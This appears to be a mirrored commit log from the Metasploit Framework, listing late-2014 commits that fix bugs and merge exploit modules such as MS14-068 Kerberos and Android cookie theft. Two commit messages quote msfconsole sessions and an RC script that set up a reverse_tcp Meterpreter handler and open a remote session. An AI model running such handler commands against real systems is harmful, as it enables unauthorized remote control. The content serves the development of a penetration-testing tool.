1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00
Commit Graph

30039 Commits

Author SHA1 Message Date
jvazquez-r7
f17a7e8a61 Better handling of the unix domain socket argument 2014-12-30 18:36:28 -06:00
jvazquez-r7
4df4e8b9d6 Add support for linux meterpreter migration 2014-12-30 18:34:24 -06:00
jvazquez-r7
56df2d0062 Add support for linux meterpreter migrate types 2014-12-30 18:30:15 -06:00
sinn3r
553030b22d
Land #4473 - Log backtraces by default 2014-12-30 18:13:33 -06:00
Tod Beardsley
d248cad462
Fixes #4472, a broken meterpreter script 2014-12-30 14:32:59 -06:00
Tod Beardsley
135faeee29
Land #4095, specs for Rex::OLE 2014-12-30 14:25:09 -06:00
Christian Mehlmauer
6444d8ba64
use kind_of? for checking exceptions 2014-12-30 21:16:57 +01:00
William Vu
ce0bbca6ed
Land #4487, no spinnerz on Windows :( 2014-12-30 14:06:05 -06:00
Tod Beardsley
a8e907d68b
Land #4479, nil comparisons and missing DLLs
Also fixes #4474.
2014-12-30 13:55:54 -06:00
sinn3r
48919eadb6
Land #4444 - i-FTP BoF 2014-12-30 12:38:28 -06:00
Brent Cook
bdac5db695 remove usage of ==/!= nil
Adjust all module-loading libraries to have consistent nil?/!nil? checking and
'if' style.
2014-12-30 10:59:49 -06:00
Brent Cook
125cc27f7a updated expected exception from a bad module load 2014-12-30 10:57:37 -06:00
Tod Beardsley
6ded5a7eb4
Avoid spinner on Windows
Fixes #4147, probably.
2014-12-30 10:17:56 -06:00
William Vu
4fd4d51d78
Land #4485, Drupageddon greedy regex fix 2014-12-30 10:16:57 -06:00
sinn3r
5c2f972ec1
Land #4483 - Alias Rex::Ui::Text::Output::Tee print_raw to write 2014-12-30 02:23:00 -06:00
Christian Mehlmauer
96fe693c54
update drupal regex 2014-12-30 09:12:39 +01:00
Jon Hart
d727ac5367
Alias Rex::Ui::Text::Output::Tee print_raw to write, fixes #4469 and #4363 2014-12-29 16:47:04 -08:00
jvazquez-r7
e55b612206
Land #4482, @wchen-r7's fix for response_timeout on sessions command 2014-12-29 17:34:29 -06:00
sinn3r
9af3fd01d4 Fix response_timeout
response_timeout is a method specific to a meterpreter session, not
shell. So if the user is using a shell type payload, he will never
see a backtrace before interacting with the sessions.
2014-12-29 17:03:50 -06:00
sinn3r
555713b6ae
Land #4456 - MS14-068, Kerberos Checksum (plus krb protocol support) 2014-12-29 16:09:28 -06:00
sinn3r
f2130311fa Add the MSF blog reference 2014-12-29 16:08:35 -06:00
Brent Cook
f9b141c1e2
Land #4442, wchen-r7's configurable session response timeout option
fixes #4431
2014-12-29 13:02:47 -06:00
Brent Cook
5d70b837ed handle nil results from MeterpreterBinaries.path
When a meterpreter binary cannot be found, give the user some hint about what
went wrong.

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.43.1
lhost => 192.168.43.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.43.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.43.252
[*] Meterpreter session 1 opened (192.168.43.1:4444 -> 192.168.43.252:49297) at 2014-12-29 12:32:37 -0600

meterpreter > use mack
Loading extension mack...
[-] Failed to load extension: No module of the name ext_server_mack.x86.dll found
```

This is also useful for not scaring away would-be developers who replaced only
half (the wrong half) of their DLLs from a fresh meterpreter build and
everything exploded. Not that thats ever happened to me :)
2014-12-29 12:34:02 -06:00
Tod Beardsley
72eb8e6503
Land #4475, inverted timeout fix 2014-12-29 11:37:28 -06:00
Brent Cook
e286aeb837 patch metsvc to use MeterpreterBinaries.path
fixes #4472
2014-12-29 11:21:21 -06:00
Brent Cook
bbb41c39b8 fix backward meterpreter packet timeout logic
The current logic times out every packet almost immediately, making it possible
for almost any non-trivial meterpreter session to receive duplicate packets.

This causes problems especially with any interactions that involve passing
resource handles or pointers back and forth between MSF and meterpreter, since
meterpreter can be told to operate on freed pointers, double-closes, etc.

This probably fixes tons of heisenbugs, including #3798.

To reproduce this, I enabled all debug messages in meterpreter to slow it
down, then ran this RC script with a reverse TCP meterpreter, after linking in
the test modules:

(cd modules/post
 ln -s ../../test/modules/post/test)

die.rc:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
exploit -j
sleep 5
use post/test/services
set SESSION 1
run
2014-12-29 08:15:51 -06:00
Tod Beardsley
1dd9d60e34
Land #4461, Android cookie database theft
`
Thanks @jvennix-r7!
2014-12-29 08:15:21 -06:00
Tod Beardsley
d10222365b
Add Rafay's blog as a reference 2014-12-29 08:12:19 -06:00
jvennix-r7
c9f43e744d Merge pull request #16 from todb-r7/fixup-4461
Fixup #4461, Android sqllite theft bug
2014-12-28 23:08:10 -06:00
Christian Mehlmauer
3a73b40a1e
more error handling 2014-12-29 00:39:00 +01:00
Christian Mehlmauer
7b52bcb657
log errors into framework.log 2014-12-29 00:20:26 +01:00
Tod Beardsley
1236684954
Use get_uri instead, note lack of Rex::Text method
See rapid7#4461
2014-12-28 15:06:34 -06:00
Tod Beardsley
788e315fd4
Fix msftidy warnings 2014-12-28 14:53:29 -06:00
William Vu
01daadcc49
Land #4470, bind_hidden_ipknock_tcp stager 2014-12-27 17:11:25 -06:00
Borja Merino
9791acd0bf Add stager ipknock shellcode (PR 2) 2014-12-27 22:03:45 +01:00
jvazquez-r7
04772c8946 Ensure stop_service closes Rex::Proto::Http::Server 2014-12-26 13:50:03 -06:00
jvazquez-r7
655cfdd416
Land #4321, @wchen-r7's fixes #4246 ms01_026_dbldecode undef method 2014-12-26 12:48:29 -06:00
Jon Hart
51049152b6
Use Rex::Text.rand_mail_address for more realistic fake commit 2014-12-26 10:39:52 -08:00
jvazquez-r7
c1b0385a4b
Land #4460, @Meatballs1's ssl cert validation bypass on powershell web delivery 2014-12-26 12:07:45 -06:00
jvazquez-r7
2bed52dcd5
Land #4459, @bcoles's ProjectSend Arbitrary File Upload module 2014-12-26 11:28:42 -06:00
jvazquez-r7
b5b0be9001 Do minor cleanup 2014-12-26 11:24:02 -06:00
jvazquez-r7
85ab11cf52 Use print_warning consistently 2014-12-26 09:54:38 -06:00
jvazquez-r7
f31a2e070e Use print_warning to print the Kerberos error 2014-12-26 09:22:09 -06:00
jvazquez-r7
2992ae0630
Land Code to handle kerberos error codes 2014-12-24 18:06:14 -06:00
jvazquez-r7
d148848d31 Support Kerberos error codes 2014-12-24 18:05:48 -06:00
jvazquez-r7
bde92b26e9
Land #3695, @jakoblell linux desktop privilege escalation
* through screensavers / policykit user component hijacking
2014-12-24 15:52:40 -06:00
jvazquez-r7
121c0406e9 Beautify restart_command creation 2014-12-24 15:52:15 -06:00
jvazquez-r7
43ec8871bc Do minor c code cleanup 2014-12-24 15:45:38 -06:00
jvazquez-r7
92113a61ce Check payload 2014-12-24 15:43:49 -06:00
jvazquez-r7
36ac0e6279 Clean get_restart_commands 2014-12-24 14:55:18 -06:00